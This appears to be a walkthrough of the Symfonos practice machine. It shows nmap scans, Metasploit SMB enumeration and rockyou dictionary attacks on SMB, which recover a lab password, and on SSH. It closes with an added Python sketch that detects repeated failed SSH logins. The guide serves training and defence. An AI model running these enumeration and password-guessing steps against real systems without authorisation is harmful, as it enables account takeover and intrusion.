Symfonos
em50l@jejo.es$ nmap -sC -A 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:29 CEST
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
OS: Windows 6.1 (Samba 4.5.16-Debian)
Computer name: symfonos
account_used: guest
authentication_level: user
HTTP directory search:
em50l@jejo.es$ nmap 192.168.56.101 -p 80 --script http-enum
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-21 00:23 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
|_ /manual/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
User information:
msf5 > use auxiliary/scanner/smb/smb_enumusers
(reverse-i-search)`': setg
Interrupt: use the 'exit' command to quit
msf5 auxiliary(scanner/smb/smb_enumusers) > setg rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/smb/smb_enumusers) > run
[+] 192.168.56.101:139 - SYMFONOS [ helios ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5> use auxiliary/scanner/smb/smb_lookupsid
msf5 auxiliary(scanner/smb/smb_lookupsid) > run
[*] 192.168.56.101:139 - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:139 - USER=nobody RID=501
[*] 192.168.56.101:445 - PIPE(LSARPC) LOCAL(SYMFONOS - 5-21-3173842667-3005291855-38846888) DOMAIN(WORKGROUP - )
[*] 192.168.56.101:445 - USER=nobody RID=501
[*] 192.168.56.101:445 - GROUP=None RID=513
[*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > run
[+] 192.168.56.101:139 - print$ - (DS) Printer Drivers
[+] 192.168.56.101:139 - helios - (DS) Helios personal share
[+] 192.168.56.101:139 - anonymous - (DS)
[+] 192.168.56.101:139 - IPC$ - (I) IPC Service (Samba 4.5.16-Debian)
[*] 192.168.56.101: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If I browse to the URL smb://192.168.56.101/ I see the same thing.
A dictionary attack on smb????
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
...
...
...
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/smb/smb_login) > set smbuser helios
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.56.101:445 - 192.168.56.101:445 - Starting SMB login bruteforce
[-] 192.168.56.101:445 - 192.168.56.101:445 - Failed: '.\helios:123456',
[-] 192.168.56.101:445 - 192.168.56.101:445 - Failed: '.\helios:ashley',
...
...
[+] 192.168.56.101:445 - 192.168.56.101:445 - Success: '.\helios:qwerty'
^C[*] 192.168.56.101:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
A dictionary attack on ssh???.
No result..
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
…
…
…
msf5 auxiliary(scanner/ssh/ssh_login) > set username helios
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/ssh/ssh_login) > run
^C
[*] Caught interrupt from the console…
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose yes
msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.56.101:22 - Failed: 'helios:123456'
[-] 192.168.56.101:22 - Failed: 'helios:12345'
[-] 192.168.56.101:22 - Failed: 'helios:123456789'
[-] 192.168.56.101:22 - Failed: 'helios:password'
[-] 192.168.56.101:22 - Failed: 'helios:iloveyou'
[-] …
[-] …
[-] …
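From the defender's side, the one-user, many-passwords run above leaves a burst of `Failed password` entries in the target's sshd log. The following detection sketch is an added example, not part of the original write-up; the log lines are constructed in the standard OpenSSH format, and the source addresses, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in OpenSSH auth.log format (times, PIDs, ports and
# source addresses are made up for this example).
SAMPLE_LOG = """\
Jul 21 00:10:00 symfonos sshd[880]: Failed password for root from 192.168.56.50 port 50100 ssh2
Jul 21 00:40:01 symfonos sshd[901]: Failed password for helios from 192.168.56.1 port 40112 ssh2
Jul 21 00:40:03 symfonos sshd[903]: Failed password for helios from 192.168.56.1 port 40114 ssh2
Jul 21 00:40:05 symfonos sshd[905]: Failed password for helios from 192.168.56.1 port 40116 ssh2
Jul 21 00:40:07 symfonos sshd[907]: Failed password for helios from 192.168.56.1 port 40118 ssh2
Jul 21 00:40:09 symfonos sshd[909]: Failed password for helios from 192.168.56.1 port 40120 ssh2
Jul 21 00:45:00 symfonos sshd[930]: Failed password for root from 192.168.56.50 port 50102 ssh2
Jul 21 00:50:00 symfonos sshd[940]: Accepted password for helios from 192.168.56.20 port 50200 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_password_guessing(log_text, threshold=5, window_s=60, year=2019):
    """Return sorted (source_ip, user) pairs that reach `threshold` failed
    logins within `window_s` seconds. Assumes lines are in time order;
    syslog omits the year, so it is passed in."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps still in the window
    flagged = set()
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and other daemons are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[(m["ip"], m["user"])]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()           # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged.add((m["ip"], m["user"]))
    return sorted(flagged)

if __name__ == "__main__":
    for ip, user in find_password_guessing(SAMPLE_LOG):
        print(f"possible dictionary attack: {ip} -> {user}")
```

The same sliding-window count applies to Samba authentication failures, which matters on a host where the user enumeration reported `LockoutTries=0`.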